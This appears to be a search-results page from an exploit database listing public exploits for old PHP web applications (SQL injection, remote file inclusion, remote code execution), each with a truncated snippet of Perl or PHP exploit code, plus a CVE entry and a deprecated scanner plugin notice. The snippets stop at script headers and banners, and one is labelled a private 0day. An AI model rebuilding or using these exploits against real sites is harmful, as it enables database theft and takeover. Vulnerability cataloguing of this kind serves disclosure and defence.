161 matches found
PHP ZLink 'go.php' SQL注入漏洞
PHP ZLink是一款基于PHP的WEB应用程序。 PHP ZLink不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息或操作数据库。 问题是由于'go.php'脚本对用户提交的WEB参数处理缺少充分过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。 Zeak.net PHP ZLink 0.3 目前没有解决方案提供: http://www.zeak.net/ !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV3 print "\n \'/...
phpzlink-sql.txt
!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV3 print "\n \'/ "; print "\n -.- "; print "\n -----------------oOO------OOo----------------"; print "\n | PHP ZLink v0.3 go.php Remote SQL Injection |"; print "\n | coded by DNX |"; print "\n...
PHP ZLink 0.3 - 'go.php' SQL Injection
!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV3 print "\n \'/ "; print "\n -.- "; print "\n -----------------oOO------OOo----------------"; print "\n | PHP ZLink v0.3 go.php Remote SQL Injection |"; print "\n | coded by DNX |"; print "\n...
CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
Exploit for unknown platform in category web applications =================================================================== CKGold Shopping Cart 2.0 category.php Blind SQL Injection Exploit =================================================================== !/usr/bin/perl use LWP::UserAgent; us...
ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================== ABC estore 3.0 catid Remote Blind SQL Injection Exploit ========================================================== !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1...
CVE-2007-2881
Multiple stack-based buffer overflows in the SOCKS proxy support sockd in Sun Java Web Proxy Server before 4.0.5 allow remote attackers to execute arbitrary code via crafted packets during protocol negotiation...
Stack overflow
Multiple stack-based buffer overflows in the SOCKS proxy support sockd in Sun Java Web Proxy Server before 4.0.5 allow remote attackers to execute arbitrary code via crafted packets during protocol negotiation...
STWC-Counter <= 3.4.0 (downloadcounter.php) RFI Exploit
Exploit for unknown platform in category web applications ======================================================= STWC-Counter = 3.4.0 downloadcounter.php RFI Exploit ======================================================= ?php //File Inclusion Exploit for STWC-Counter = 3.4.0.0 //| //Vendor:...
STWC-Counter 3.4.0 - 'downloadcounter.php' Remote File Inclusion
?php //File Inclusion Exploit for STWC-Counter = 3.4.0.0 //Found and Exploit Coded by burncycle - burncycleatrobert-berandotde //| //Vendor: http://www.stwc-counter.de/ //Dork: www.stwc-counter.de //| //Bug in "downloadcounter.php": //.. //$stwcverzeichniss = $stwccounterverzeichniss; //...
webSPELL <= 4.01.02 (topic) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV2 print " \'/ "; print " -.- "; print " -------------------oOO------OOo-------------------"; print " | webSPELL = v4.01.02 topic Remote SQL Injection |"; print " | coded by DNX |"; print "...
webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ============================================================== webSPELL 4.01.02 showonly Remote Blind SQL Injection Exploit ============================================================== !/usr/bin/perl use LWP::UserAgent; use Getopt::Long;...
Advanced Poll 2.0.5-dev - Remote Admin Session Generator
!/usr/bin/perl -w Advanced Poll 2.0.0 = 2.0.5-dev textfile admin session gen. 0day! KEEP IT PRIVATE 0day! date: 30/07/06 diwou PHCKSEC c 2001-2006. see templates for code execution ;. use strict; use warnings; use LWP::UserAgent; use MD5; my...
FreeWPS 2.11 - 'images.php' Remote Code Execution
? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";...
FreeWPS 2.11 - images.php Remote Code Execution
FreeWPS 2.11 - images.php Remote Code Execution ? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo...
Lansuite <= 2.1.0 Beta (fid) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================= Lansuite = 2.1.0 Beta fid Remote SQL Injection Exploit ========================================================= ? errorreportingEERROR; function xssinit if !extensionloaded'phpcurl...
My Little Forum 1.5 - 'SearchString' SQL Injection
?php mlfexpl.php My Little Forum 1.5 possibly prior versions SQL Injection / MD5 password hash disclosure poc exploit with proxy support by rgod site: http://rgod.altervista.org make these changes in php.ini if you have troubles to launch this script: allowcalltimepassreference = on registergloba...
My Little Forum <= 1.5 (searchstring) SQL Injection Exploit
No description provided by source. ?php mlfexpl.php My Little Forum 1.5 possibly prior versions SQL Injection / MD5 password hash disclosure poc exploit with proxy support by rgod site: http://rgod.altervista.org make these changes in php.ini if you have troubles to launch this script:...
My Little Forum <= 1.5 (searchstring) SQL Injection Exploit
Exploit for unknown platform in category web applications =========================================================== My Little Forum = 1.5 searchstring SQL Injection Exploit =========================================================== ?php mlfexpl.php My Little Forum 1.5 possibly prior versions S...
PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit
No description provided by source. !/usr/bin/perl D A R K A S S A S S I N S C R E W 2 0 0 5 Dark Assassins - http://dark-assassins.com/ Visit us on IRC @ irc.tddirc.net DarkAssassins phpfusiondb.pl; Version 0.1 22/06/05 PHP-Fusion db backup proof-of-concept by Easyex Database backup vuln in...
FreeBSD : apache13-modssl -- format string vulnerability in proxy support (8)
The following package needs to be updated: apache+modssl+ipv6 %NASLMINLEVEL 999999 @DEPRECATED@ This script has been deprecated by freebsdpkg18974c8a1fbd11d9814e0001020eed82.nasl. Disabled on 2011/10/02. C Tenable Network Security, Inc. This script contains information extracted from VuXML :...